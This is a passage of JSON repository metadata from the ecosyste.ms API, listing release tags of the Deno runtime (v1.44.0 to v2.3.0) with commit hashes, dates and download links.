":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_u